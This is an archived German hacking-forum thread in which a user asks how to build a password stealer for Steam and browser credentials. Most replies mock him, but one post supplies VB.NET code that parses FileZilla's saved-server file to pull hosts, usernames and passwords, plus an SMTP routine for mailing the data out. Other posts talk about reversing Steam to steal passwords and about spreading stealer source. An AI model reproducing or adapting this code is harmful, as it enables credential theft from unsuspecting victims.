PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Mit VB08 Stealer erstellen...??!!??



Cr0ssfire100
30.05.2010, 21:54
Haaii Leutz...

Kann mir vll jemand von euch ein tut oder so etwas schicken worin mir jemand erklärt wie ich einen stealer erstelle der steam pws mozilla pw usw stealt..?

Danke im vorraus.. =)

PS:Sollte eine Video oder ein Text Tut sein...=)

ocz
30.05.2010, 21:59
Bitte logge dich aus und kehre nie wieder.

Wenn du einzelne fragen zum coden von SPEZIELLEN funktionen hast, kannst du die stellen und ich bin mir sicher, dass wir dir helfen können. Aber doch nicht so. Niemand wird dir ein VideoTut geben können, in dem du lernst wie man einen stealer "erstellt"(coded?).

grz

sn0w
30.05.2010, 22:00
1) Fragezeichen und Ausrufezeichen sind keine Rudeltiere!
2) Es gibt genug Sourcecodes usw in den entsprechenden Sektionen.
3) Es wird dir keiner einen fertigen Stealersource in deinen Allerwertesten schieben.

MfG

Cr0ssfire100
30.05.2010, 22:01
Aber wie kann ich es lehrern ...? wie hast du es gelernt...?

hl2.exe
30.05.2010, 22:02
btw Wegen dem Steam-Update kann man nur noch den Username stealen.

c1ox
30.05.2010, 22:02
Kauf dir ein Buch zu der Sprache
btw : Haaii Leutz!? Wie alt bist du denn? O.o

ocz
30.05.2010, 22:03
Du kannst erstmal coden "lehrern". Optimalerweise nicht in VB. Wenn du Grundlagen in deiner Sprache gelernt hast und dich noch ein wenig mit der WinAPI auseinandergesetzt hast, kannst du hier spezielle Fragen stellen.
Threads zu "Wie fange ich am besten mit Sprache X an" gibt es hier zu Hauf.


btw Wegen dem Steam-Update kann man nur noch den Username stealen.
Müsste man halt nochmal reversen, dann kann man auch das PW stealen.

Cr0ssfire100
31.05.2010, 06:19
Wie habt ihr denn die grundlagen gelernt...?

Ih habe auch gehört dass es bücher für vb 08 gib wie sollte ich an die sache ran gehen..:?

Sawyer
31.05.2010, 06:35
Ein aktuelles Buch zu der jeweiligen Sprache kaufen, und dieses durcharbeiten. Am besten Lernt man, wenn man jedes gezeigte Stückchen Code aus dem Buch auch abtippt, und sich nicht nur ansieht. Am besten behält man das gelernte, wenn man den Code auch noch etwas modifiziert und etwas damit "rumspielt".

Aber ohne überhaupt die Grundlagen gelernt zu haben, und dabei schon an Stealer zu denken, liegt weit aus deinem jetzigen Kenntnisstand um das zu verwirklichen. Glaube aber nicht das du eine Woche Lernst, und dann bereits fertig bist. Einige Wochen solltest du dabei schon einkalkulieren.

MfG, Sawyer

G.U.N
31.05.2010, 06:58
Also da ihr in ja alle so runtermacht mach ich mit.

Böser, böser Cr0ssfire100 (http://free-hack.com/../member.php?u=64640) - solltest halt mal Google verwenden, oder da nachschauen wo sonnst keiner nach sowas suchen würde.

Youtube VB 2008 Filezilla Stealer


und dazu noch das was der rumnuschelt


Hack:

Try
RichTextBox1.LoadFile(Environment.GetFolderPath(En vironment.SpecialFolder.ApplicationData) & "\FileZilla\recentservers.xml", RichTextBoxStreamType.PlainText)
For Each i In RichTextBox1.Lines
If i.Contains("<Host>") Then
RichTextBox2.Text &= "FTP: " & i.Replace("<Host>", "").Replace("</Host>", "").Replace(" ", "") & vbNewLine
End If
If i.Contains("<Port>") Then
RichTextBox2.Text &= "Port: " & i.Replace("<Port>", "").Replace("</Port>", "").Replace(" ", "") & vbNewLine
End If
If i.Contains("<User>") Then
RichTextBox2.Text &= "User: " & i.Replace("<User>", "").Replace("</User>", "").Replace(" ", "") & vbNewLine
End If
If i.Contains("<Pass>") Then
RichTextBox2.Text &= "Paswort: " & i.Replace("<Pass>", "").Replace("</Pass>", "").Replace(" ", "") & vbNewLine & vbNewLine & "_________________________________" & vbNewLine & vbNewLine
End If
Next
Catch
End Try

Senden:

Try
Dim Mail As New MailMessage()
Mail.From = New MailAddress("DeineMail")
Mail.To.Add("DeineMail")
Mail.Subject = ("Betreff")
Dim server As New SmtpClient("smtp.web.de")
server.Port = 587
server.Credentials = New System.Net.NetworkCredential("DeineMail", "Passwort")
server.EnableSsl = True
server.Send(Mail)
End
Catch
End Try

' by SlowCatch

Code-C4
31.05.2010, 07:00
Wie habt ihr denn die grundlagen gelernt...?

Ih habe auch gehört dass es bücher für vb 08 gib wie sollte ich an die sache ran gehen..:?

So überhaupt die Frage: "Wie habt ihr Gelernt"

wie hast du das gehen oder laufen sowie Sprechen gelernt ?
Du solltest mal Bücher,Tuts O.Ä mal anschauen^^

Sawyer
31.05.2010, 07:07
@G.U.N
Wirf ihm nur die fertigen Sachen hin, damit aus ihm nie was wird als ein Mensch der nur STRG + C - STRG + V kennt ;)

Daraus Lernt er im Endeffekt gar nicht wenn nicht die nötigen Grundlagen vorhanden sind. Warum derartige Tutorials überhaupt nötig sind oder sogar Existieren, ist mir wirklich unerklärlich. Zumal man das schon mit guten Grundlagen-Kenntnisse alleine bewerkstelligen kann.

SIK
31.05.2010, 09:44
Melde dich mal per pn bei mir.
Ich bring dir ein parr Grundlagen in Vb.net bei.

ocz
31.05.2010, 12:16
Mhmmm, das ist dann erst richtig Scheiße... Aus ungeduld .NET oder so einen Schrott lernen und sich hinterher wundern, dass man nichts zu Stande bringt.
Abgesehen davon @GUN:
ALs ich das letzte mal nen Filezilla stealer geschrieben habe, war das einfach ne XML oder ini datei die geparsed werden musste (Seit ich die src bei 1337crew reingestellt hab, fliegt die inklusive meiner SMTPengine überrall unter anderen Namen rum).
Soetwas hätte er sehr gut sogar ohne Reversing Kenntnisse (FIleMon/RegMon) rausfinden und sich den Code dann selber erarbeiten können (Sogar in Visual Basic :D).

Grz

ExTaSy
31.05.2010, 19:49
Mhmmm, das ist dann erst richtig Scheiße... Aus ungeduld .NET oder so einen Schrott lernen und sich hinterher wundern, dass man nichts zu Stande bringt.@Vorposter: Du beleidigst damit jetzt die ganze .NET Sprache und alle die sie gelernt haben:confused:

ocz
31.05.2010, 19:54
@Vorposter: Du beleidigst damit jetzt die ganze .NET Sprache und alle die sie gelernt haben:confused:

Das war meine Intention.
Allerdings darf man die Leute ausnehmen, die .NET lernen mussten, es aber verabscheuen.

G.U.N
31.05.2010, 19:54
@Sawyer (http://free-hack.com/../member.php?u=44795) Klar ist mit schon das so nie was aus Ihm wird aber das ist doch auch gut so.

Wenn jedes Kiddy sich nen FUD Crypter Coden kann kündige ich meinen Internetanschluss.

stunt54
31.05.2010, 20:20
Let me google that for you (http://lmgtfy.com/?q=VB.NET+Stealer)

hackerking
31.05.2010, 20:21
Vote4Close
Vote4Kick
http://www.sheep.physicsisbroken.com/jesus-facepalm-facepalm-jesus-epic-demotivational-poster-1218659828.jpg

Hol dir ein Buch, und komm in einem Jahr wenn du es durchgelesen hast wieder.

Bonkers
31.05.2010, 20:35
Man, das Youtube-Video ist ja klasse :)

"Jetzt gehen wir in den Kot..."


Daraus Lernt er im Endeffekt gar nicht

Wenns jeder kann sind wir ja nichts besonderes mehr - Ich mag Leute die sich definitiv nie zu einer Konkurrenz entwickeln können ;)

Apex
31.05.2010, 21:12
So überhaupt die Frage: "Wie habt ihr Gelernt"

wie hast du das gehen oder laufen sowie Sprechen gelernt ?
Du solltest mal Bücher,Tuts O.Ä mal anschauen^^

Er hat sich sicherlich kein Buch mit dem Namen "Howto sprechen und laufen" gekauft. Und seine Mama wird ihm sicherlich auch nicht das coden beibringen. ;)

Wie schon zu oft gesagt: Kauf dir ein aktuelles Buch, jenachdem in welcher Sprache du anfangen willst, ich würde dir da gerne C++ ans Herz legen, da du damit eigentlich fast alles machen kannst. Würde dir auch das Buch hier ans Herz legen: C++ von A bis Z: Das umfassende Handbuch Galileo Computing: Amazon.de: Jürgen Wolf: Bücher

Ist zwar vom letzten Jahr aber hab bis jetzt nur gutes davon gehört.